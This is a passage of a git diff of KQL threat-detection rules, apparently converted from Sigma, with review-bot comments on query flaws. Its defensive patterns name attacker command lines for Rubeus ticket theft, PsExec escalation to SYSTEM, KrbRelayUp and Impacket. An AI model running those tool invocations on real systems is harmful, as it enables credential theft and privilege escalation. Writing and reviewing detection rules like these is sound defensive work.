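Review bot: The `| where` clause enumerates every cross product of the five dash/slash variants, the `s`/`i` ordering and the three shells — roughly 150 `contains` terms — which nobody can audit for a missing or mistyped combination; the same expansion recurs in the psexec_paexec_escalation_to_local_system.kql hunk that follows. A single regular expression covers the identical set while keeping the case-insensitivity of `contains`: `ProcessCommandLine matches regex @"(?i) [-/–—―](s|s [-/–—―]i|i [-/–—―]s) (cmd|pwsh|powershell)"`; Kusto's RE2 engine honours `(?i)`, and the character class lists exactly the five separators used in the hunk. If the expanded form is kept for traceability to the Sigma source (it looks like the output of its windash modifier, though the hunk does not say so), a comment such as `// Auto-expanded from the Sigma rule's dash variants; edit the source rule, not this list` would explain the shape to the next reader.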
@@ -0,0 +1,13 @@ +// Title: PsExec/PAExec Escalation to LOCAL SYSTEM +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-11-23 +// Level: high +// Description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001 +// False Positives: +// - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare) +// - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension + +DeviceProcessEvents +| where (ProcessCommandLine contains "psexec" or ProcessCommandLine contains "paexec" or ProcessCommandLine contains "accepteula") and (ProcessCommandLine contains " -s cmd" or ProcessCommandLine contains " /s cmd" or ProcessCommandLine contains " –s cmd" or ProcessCommandLine contains " —s cmd" or ProcessCommandLine contains " ―s cmd" or ProcessCommandLine contains " -s -i cmd" or ProcessCommandLine contains " -s /i cmd" or ProcessCommandLine contains " -s –i cmd" or ProcessCommandLine contains " -s —i cmd" or ProcessCommandLine contains " -s ―i cmd" or ProcessCommandLine contains " /s -i cmd" or ProcessCommandLine contains " /s /i cmd" or ProcessCommandLine contains " /s –i cmd" or ProcessCommandLine contains " /s —i cmd" or ProcessCommandLine contains " /s ―i cmd" or ProcessCommandLine contains " –s -i cmd" or ProcessCommandLine contains " –s /i cmd" or ProcessCommandLine contains " –s –i cmd" or ProcessCommandLine contains " –s —i cmd" or ProcessCommandLine contains " –s ―i cmd" or ProcessCommandLine contains " —s -i cmd" or ProcessCommandLine contains " —s /i cmd" or ProcessCommandLine contains " —s –i cmd" or ProcessCommandLine contains " —s —i cmd" or ProcessCommandLine contains " —s ―i cmd" or ProcessCommandLine 
contains " ―s -i cmd" or ProcessCommandLine contains " ―s /i cmd" or ProcessCommandLine contains " ―s –i cmd" or ProcessCommandLine contains " ―s —i cmd" or ProcessCommandLine contains " ―s ―i cmd" or ProcessCommandLine contains " -i -s cmd" or ProcessCommandLine contains " -i /s cmd" or ProcessCommandLine contains " -i –s cmd" or ProcessCommandLine contains " -i —s cmd" or ProcessCommandLine contains " -i ―s cmd" or ProcessCommandLine contains " /i -s cmd" or ProcessCommandLine contains " /i /s cmd" or ProcessCommandLine contains " /i –s cmd" or ProcessCommandLine contains " /i —s cmd" or ProcessCommandLine contains " /i ―s cmd" or ProcessCommandLine contains " –i -s cmd" or ProcessCommandLine contains " –i /s cmd" or ProcessCommandLine contains " –i –s cmd" or ProcessCommandLine contains " –i —s cmd" or ProcessCommandLine contains " –i ―s cmd" or ProcessCommandLine contains " —i -s cmd" or ProcessCommandLine contains " —i /s cmd" or ProcessCommandLine contains " —i –s cmd" or ProcessCommandLine contains " —i —s cmd" or ProcessCommandLine contains " —i ―s cmd" or ProcessCommandLine contains " ―i -s cmd" or ProcessCommandLine contains " ―i /s cmd" or ProcessCommandLine contains " ―i –s cmd" or ProcessCommandLine contains " ―i —s cmd" or ProcessCommandLine contains " ―i ―s cmd" or ProcessCommandLine contains " -s pwsh" or ProcessCommandLine contains " /s pwsh" or ProcessCommandLine contains " –s pwsh" or ProcessCommandLine contains " —s pwsh" or ProcessCommandLine contains " ―s pwsh" or ProcessCommandLine contains " -s -i pwsh" or ProcessCommandLine contains " -s /i pwsh" or ProcessCommandLine contains " -s –i pwsh" or ProcessCommandLine contains " -s —i pwsh" or ProcessCommandLine contains " -s ―i pwsh" or ProcessCommandLine contains " /s -i pwsh" or ProcessCommandLine contains " /s /i pwsh" or ProcessCommandLine contains " /s –i pwsh" or ProcessCommandLine contains " /s —i pwsh" or ProcessCommandLine contains " /s ―i pwsh" or ProcessCommandLine contains " –s -i 
pwsh" or ProcessCommandLine contains " –s /i pwsh" or ProcessCommandLine contains " –s –i pwsh" or ProcessCommandLine contains " –s —i pwsh" or ProcessCommandLine contains " –s ―i pwsh" or ProcessCommandLine contains " —s -i pwsh" or ProcessCommandLine contains " —s /i pwsh" or ProcessCommandLine contains " —s –i pwsh" or ProcessCommandLine contains " —s —i pwsh" or ProcessCommandLine contains " —s ―i pwsh" or ProcessCommandLine contains " ―s -i pwsh" or ProcessCommandLine contains " ―s /i pwsh" or ProcessCommandLine contains " ―s –i pwsh" or ProcessCommandLine contains " ―s —i pwsh" or ProcessCommandLine contains " ―s ―i pwsh" or ProcessCommandLine contains " -i -s pwsh" or ProcessCommandLine contains " -i /s pwsh" or ProcessCommandLine contains " -i –s pwsh" or ProcessCommandLine contains " -i —s pwsh" or ProcessCommandLine contains " -i ―s pwsh" or ProcessCommandLine contains " /i -s pwsh" or ProcessCommandLine contains " /i /s pwsh" or ProcessCommandLine contains " /i –s pwsh" or ProcessCommandLine contains " /i —s pwsh" or ProcessCommandLine contains " /i ―s pwsh" or ProcessCommandLine contains " –i -s pwsh" or ProcessCommandLine contains " –i /s pwsh" or ProcessCommandLine contains " –i –s pwsh" or ProcessCommandLine contains " –i —s pwsh" or ProcessCommandLine contains " –i ―s pwsh" or ProcessCommandLine contains " —i -s pwsh" or ProcessCommandLine contains " —i /s pwsh" or ProcessCommandLine contains " —i –s pwsh" or ProcessCommandLine contains " —i —s pwsh" or ProcessCommandLine contains " —i ―s pwsh" or ProcessCommandLine contains " ―i -s pwsh" or ProcessCommandLine contains " ―i /s pwsh" or ProcessCommandLine contains " ―i –s pwsh" or ProcessCommandLine contains " ―i —s pwsh" or ProcessCommandLine contains " ―i ―s pwsh" or ProcessCommandLine contains " -s powershell" or ProcessCommandLine contains " /s powershell" or ProcessCommandLine contains " –s powershell" or ProcessCommandLine contains " —s powershell" or ProcessCommandLine contains " ―s 
powershell" or ProcessCommandLine contains " -s -i powershell" or ProcessCommandLine contains " -s /i powershell" or ProcessCommandLine contains " -s –i powershell" or ProcessCommandLine contains " -s —i powershell" or ProcessCommandLine contains " -s ―i powershell" or ProcessCommandLine contains " /s -i powershell" or ProcessCommandLine contains " /s /i powershell" or ProcessCommandLine contains " /s –i powershell" or ProcessCommandLine contains " /s —i powershell" or ProcessCommandLine contains " /s ―i powershell" or ProcessCommandLine contains " –s -i powershell" or ProcessCommandLine contains " –s /i powershell" or ProcessCommandLine contains " –s –i powershell" or ProcessCommandLine contains " –s —i powershell" or ProcessCommandLine contains " –s ―i powershell" or ProcessCommandLine contains " —s -i powershell" or ProcessCommandLine contains " —s /i powershell" or ProcessCommandLine contains " —s –i powershell" or ProcessCommandLine contains " —s —i powershell" or ProcessCommandLine contains " —s ―i powershell" or ProcessCommandLine contains " ―s -i powershell" or ProcessCommandLine contains " ―s /i powershell" or ProcessCommandLine contains " ―s –i powershell" or ProcessCommandLine contains " ―s —i powershell" or ProcessCommandLine contains " ―s ―i powershell" or ProcessCommandLine contains " -i -s powershell" or ProcessCommandLine contains " -i /s powershell" or ProcessCommandLine contains " -i –s powershell" or ProcessCommandLine contains " -i —s powershell" or ProcessCommandLine contains " -i ―s powershell" or ProcessCommandLine contains " /i -s powershell" or ProcessCommandLine contains " /i /s powershell" or ProcessCommandLine contains " /i –s powershell" or ProcessCommandLine contains " /i —s powershell" or ProcessCommandLine contains " /i ―s powershell" or ProcessCommandLine contains " –i -s powershell" or ProcessCommandLine contains " –i /s powershell" or ProcessCommandLine contains " –i –s powershell" or ProcessCommandLine contains " –i —s 
powershell" or ProcessCommandLine contains " –i ―s powershell" or ProcessCommandLine contains " —i -s powershell" or ProcessCommandLine contains " —i /s powershell" or ProcessCommandLine contains " —i –s powershell" or ProcessCommandLine contains " —i —s powershell" or ProcessCommandLine contains " —i ―s powershell" or ProcessCommandLine contains " ―i -s powershell" or ProcessCommandLine contains " ―i /s powershell" or ProcessCommandLine contains " ―i –s powershell" or ProcessCommandLine contains " ―i —s powershell" or ProcessCommandLine contains " ―i ―s powershell")
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/pua_csexec_execution.kql b/KQL/rules/Resource Development/pua_csexec_execution.kql
new file mode 100644
index 00000000..e8917c10
--- /dev/null
+++ b/KQL/rules/Resource Development/pua_csexec_execution.kql
@@ -0,0 +1,10 @@
+// Title: PUA - CsExec Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-22
+// Level: high
+// Description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001, attack.execution, attack.t1569.002
+
+DeviceProcessEvents
+| where FolderPath endswith "\\csexec.exe" or ProcessVersionInfoFileDescription =~ "csexec"
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql b/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql
new file mode 100644
index 00000000..0dbbf755
--- /dev/null
+++ b/KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql
@@ -0,0 +1,13 @@
+// Title: PUA - Sysinternal Tool Execution - Registry
+// Author: Markus Neis
+// Date: 2017-08-28
+// Level: low
+// Description: Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+// - Legitimate use of SysInternals tools
+// - Programs that use the same Registry Key
+
+DeviceRegistryEvents
+| where ActionType =~ "RegistryKeyCreated" and RegistryKey endswith "\\EulaAccepted"
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql b/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql
new file mode 100644
index 00000000..d3ff592c
--- /dev/null
+++ b/KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql
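Review bot: `ActionType =~ "RegistryKeyCreated" and RegistryKey endswith "\\EulaAccepted"` is unlikely to ever match in this telemetry: Sysinternals tools record EULA acceptance as a DWORD *value* named `EulaAccepted` under the per-tool key, so the event produced is a `RegistryValueSet` whose `RegistryKey` ends with the tool name and whose `RegistryValueName` is `EulaAccepted`; the Sigma source matches Sysmon's `TargetObject`, which embeds the value name, and that does not carry over to the split MDE columns. Unless this backend is known to populate `RegistryKey` with the full value path (I do not believe it does), the line should read `| where ActionType =~ "RegistryValueSet" and RegistryValueName =~ "EulaAccepted"`. The same mapping applies to `pua_sysinternals_tools_execution_registry.kql` in the next file section, where the per-tool `RegistryKey contains` filters can stay and only the `ActionType` and `endswith` tests change.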
@@ -0,0 +1,12 @@
+// Title: PUA - Sysinternals Tools Execution - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-24
+// Level: medium
+// Description: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+// - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment
+
+DeviceRegistryEvents
+| where ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\SDelete" or RegistryKey contains "\\Sysinternals") and RegistryKey endswith "\\EulaAccepted"
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql b/KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql
new file mode 100644
index 00000000..cb5b7879
--- /dev/null
+++ b/KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql
@@ -0,0 +1,10 @@
+// Title: Renamed SysInternals DebugView Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-05-28
+// Level: high
+// Description: Detects suspicious renamed SysInternals DebugView execution
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+
+DeviceProcessEvents
+| where ProcessVersionInfoProductName =~ "Sysinternals DebugView" and (not((FolderPath endswith "\\Dbgview.exe" and ProcessVersionInfoOriginalFileName =~ "Dbgview.exe")))
\ No newline at end of file
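Review bot: As with the other accepteula rules in this batch, `ActionType =~ "RegistryKeyCreated" and ... RegistryKey endswith "\\EulaAccepted"` is unlikely to ever match in DeviceRegistryEvents, where the value name is carried in `RegistryValueName` and setting it surfaces as `RegistryValueSet`. I would write `| where ActionType =~ "RegistryValueSet" and RegistryValueName =~ "EulaAccepted" and (RegistryKey contains "\\Active Directory Explorer" or ... or RegistryKey contains "\\Sysinternals")`. If the tools keep their default `HKCU\Software\Sysinternals\<Tool>` key, the `"\\Sysinternals"` term already subsumes the per-tool names and the list mainly serves as documentation.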
diff --git a/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql b/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql
new file mode 100644
index 00000000..bd4f091f
--- /dev/null
+++ b/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Execution Of Renamed Sysinternals Tools - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-24
+// Level: high
+// Description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoggedon" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\PsPing" or RegistryKey contains "\\PsService" or RegistryKey contains "\\SDelete") and RegistryKey endswith "\\EulaAccepted") and (not((InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe" or InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livekd64.exe" or InitiatingProcessFolderPath endswith "\\procdump.exe" or InitiatingProcessFolderPath endswith "\\procdump64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\PsExec.exe" or InitiatingProcessFolderPath endswith "\\PsExec64.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon64.exe" or InitiatingProcessFolderPath endswith "\\psloglist.exe" or InitiatingProcessFolderPath endswith
"\\psloglist64.exe" or InitiatingProcessFolderPath endswith "\\pspasswd.exe" or InitiatingProcessFolderPath endswith "\\pspasswd64.exe" or InitiatingProcessFolderPath endswith "\\PsPing.exe" or InitiatingProcessFolderPath endswith "\\PsPing64.exe" or InitiatingProcessFolderPath endswith "\\PsService.exe" or InitiatingProcessFolderPath endswith "\\PsService64.exe" or InitiatingProcessFolderPath endswith "\\sdelete.exe"))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql b/KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql new file mode 100644 index 00000000..5aeb0935 --- /dev/null +++ b/KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Keyboard Layout Load +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-12 +// Level: medium +// Description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base) + +DeviceRegistryEvents +| where (RegistryValueData contains "00000429" or RegistryValueData contains "00050429" or RegistryValueData contains "0000042a") and (RegistryKey endswith "\\Keyboard Layout\\Preload*" or RegistryKey endswith "\\Keyboard Layout\\Substitutes*") \ No newline at end of file diff --git a/KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql b/KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql new file mode 100644 index 00000000..bf26a7da --- /dev/null +++ b/KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql 
@@ -0,0 +1,12 @@
+// Title: Uncommon File Created In Office Startup Folder
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-05
+// Level: high
+// Description: Detects the creation of a file with an uncommon extension in an Office application startup folder
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001
+// False Positives:
+// - False positive might stem from rare extensions used by other Office utilities.
+
+DeviceFileEvents
+| where (((FolderPath contains "\\Microsoft\\Word\\STARTUP" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\STARTUP")) and (not((FolderPath endswith ".docb" or FolderPath endswith ".docm" or FolderPath endswith ".docx" or FolderPath endswith ".dotm" or FolderPath endswith ".mdb" or FolderPath endswith ".mdw" or FolderPath endswith ".pdf" or FolderPath endswith ".wll" or FolderPath endswith ".wwl")))) or ((FolderPath contains "\\Microsoft\\Excel\\XLSTART" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\XLSTART")) and (not((FolderPath endswith ".xll" or FolderPath endswith ".xls" or FolderPath endswith ".xlsm" or FolderPath endswith ".xlsx" or FolderPath endswith ".xlt" or FolderPath endswith ".xltm" or FolderPath endswith ".xlw"))))) and (not((((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe")) or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe"))))
\ No newline at end of file
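Review bot: There is no `ActionType` filter, so a rule titled "File Created" also fires on `FileDeleted`, `FileModified` and `FileRenamed` events in DeviceFileEvents; removing a stray file from an XLSTART folder would raise a high-severity alert. Prefix the `where` with `ActionType =~ "FileCreated" and` (or `ActionType in~ ("FileCreated", "FileRenamed")` if files moved into the folder should count). The extension allow-lists and the Office/ClickToRun exclusions otherwise follow the Sigma logic and look fine.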
diff --git a/KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql b/KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql
new file mode 100644
index 00000000..8fb57420
--- /dev/null
+++ b/KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql
@@ -0,0 +1,12 @@
+// Title: Usage of Renamed Sysinternals Tools - RegistrySet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-24
+// Level: high
+// Description: Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where ((RegistryKey contains "\\PsExec" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\Active Directory Explorer") and RegistryKey endswith "\\EulaAccepted") and (not((InitiatingProcessFolderPath endswith "\\PsExec.exe" or InitiatingProcessFolderPath endswith "\\PsExec64.exe" or InitiatingProcessFolderPath endswith "\\procdump.exe" or InitiatingProcessFolderPath endswith "\\procdump64.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe" or InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livekd64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\psloglist.exe" or InitiatingProcessFolderPath endswith "\\psloglist64.exe" or InitiatingProcessFolderPath endswith "\\pspasswd.exe" or InitiatingProcessFolderPath endswith "\\pspasswd64.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe"))) and (not(isnull(InitiatingProcessFolderPath)))
\ No newline at end of file
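Review bot: `RegistryKey endswith "\\EulaAccepted"` again searches the key-path column for a value name; with no `ActionType` filter and a title promising "RegistrySet", the intended selection is `ActionType =~ "RegistryValueSet" and RegistryValueName =~ "EulaAccepted"` combined with the existing `RegistryKey contains` tool list. Once corrected, this rule and `suspicious_execution_of_renamed_sysinternals_tools_registry.kql` from the same batch differ only in a few tool names (this one lacks PsLoggedon, PsPing, PsService and SDelete) and in the `isnull` guard, so consider consolidating them or at least keeping the two exclusion lists aligned. The trailing `not(isnull(InitiatingProcessFolderPath))` is the right call and is what the sibling is missing.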
diff --git a/KQL/rules/Resource Development/vhd_image_download_via_browser.kql b/KQL/rules/Resource Development/vhd_image_download_via_browser.kql
new file mode 100644
index 00000000..d3d176b0
--- /dev/null
+++ b/KQL/rules/Resource Development/vhd_image_download_via_browser.kql
@@ -0,0 +1,14 @@
+// Title: VHD Image Download Via Browser
+// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
+// Date: 2021-10-25
+// Level: medium
+// Description: Detects creation of ".vhd"/".vhdx" files by browser processes.
+Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
+
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001
+// False Positives:
+// - Legitimate downloads of ".vhd" files would also trigger this
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe") and FolderPath contains ".vhd"
\ No newline at end of file
diff --git a/Lateral Movement/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql b/Lateral Movement/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql
deleted file mode 100644
index 2846d8ff..00000000
--- a/Lateral Movement/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql
+++ /dev/null
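Review bot: The second description line, `+Malware can use mountable Virtual Hard Disk ".vhd" files ...`, is emitted without the `//` prefix, so it is plain text inside the query and the file will not parse; the converter needs to comment every line of a multi-line Sigma description (`// Malware can use ...`). Separately, `FolderPath contains ".vhd"` matches the substring anywhere in the path (a folder named `tools.vhd`, for instance) and, with no `ActionType` filter, fires on deletes and renames as well. `ActionType =~ "FileCreated" and (FolderPath endswith ".vhd" or FolderPath endswith ".vhdx")` keeps the intent stated in the title.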
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali
-// Date: 2019/12/30
-// Level: medium
-// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote
-// Tags: attack.lateral_movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))))
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_KrbRelayUp_Execution.kql b/Lateral Movement/HackTool_-_KrbRelayUp_Execution.kql
deleted file mode 100644
index d07c94db..00000000
--- a/Lateral Movement/HackTool_-_KrbRelayUp_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/26
-// Level: high
-// Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced
-// Tags: attack.credential_access, attack.t1558.003, attack.lateral_movement, attack.t1550.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " relay " and ProcessCommandLine contains " -Domain " and ProcessCommandLine contains " -ComputerName ") or (ProcessCommandLine contains " krbscm " and ProcessCommandLine contains " -sc ") or (ProcessCommandLine contains " spawn " and ProcessCommandLine contains " -d " and ProcessCommandLine contains " -cn " and ProcessCommandLine contains " -cp ") or (FolderPath endswith "\\KrbRelayUp.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelayUp.exe")
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql b/Lateral Movement/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql
deleted file mode 100644
index 3ef522cf..00000000
--- a/Lateral Movement/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch
-// Date: 2019/09/03
-// Level: high
-// Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
-// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/C" and ProcessCommandLine contains "Windows\\Temp\\" and ProcessCommandLine contains "&1") and (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs" or InitiatingProcessCommandLine contains "taskeng.exe")) or ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/Q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "\\\\127.0.0.1\\" and ProcessCommandLine contains "&1") and (InitiatingProcessFolderPath endswith "\\wmiprvse.exe" or InitiatingProcessFolderPath endswith "\\mmc.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\services.exe"))
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_Rubeus_Execution.kql b/Lateral Movement/HackTool_-_Rubeus_Execution.kql
deleted file mode 100644
index 134f2523..00000000
--- a/Lateral Movement/HackTool_-_Rubeus_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/12/19
-// Level: critical
-// Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
-// Tags: attack.credential_access, attack.t1003, attack.t1558.003, attack.lateral_movement, attack.t1550.003
-DeviceProcessEvents
-| where FolderPath endswith "\\Rubeus.exe" or ProcessVersionInfoOriginalFileName =~ "Rubeus.exe" or ProcessVersionInfoFileDescription =~ "Rubeus" or (ProcessCommandLine contains "asreproast " or ProcessCommandLine contains "dump /service:krbtgt " or ProcessCommandLine contains "dump /luid:0x" or ProcessCommandLine contains "kerberoast " or ProcessCommandLine contains "createnetonly /program:" or ProcessCommandLine contains "ptt /ticket:" or ProcessCommandLine contains "/impersonateuser:" or ProcessCommandLine contains "renew /ticket:" or ProcessCommandLine contains "asktgt /user:" or ProcessCommandLine contains "harvest /interval:" or ProcessCommandLine contains "s4u /user:" or ProcessCommandLine contains "s4u /ticket:" or ProcessCommandLine contains "hash /password:" or ProcessCommandLine contains "golden /aes256:" or ProcessCommandLine contains "silver /user:")
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_SharpMove_Tool_Execution.kql b/Lateral Movement/HackTool_-_SharpMove_Tool_Execution.kql
deleted file mode 100644
index 2c391cb7..00000000
--- a/Lateral Movement/HackTool_-_SharpMove_Tool_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Luca Di Bartolomeo (CrimpSec)
-// Date: 2024/01/29
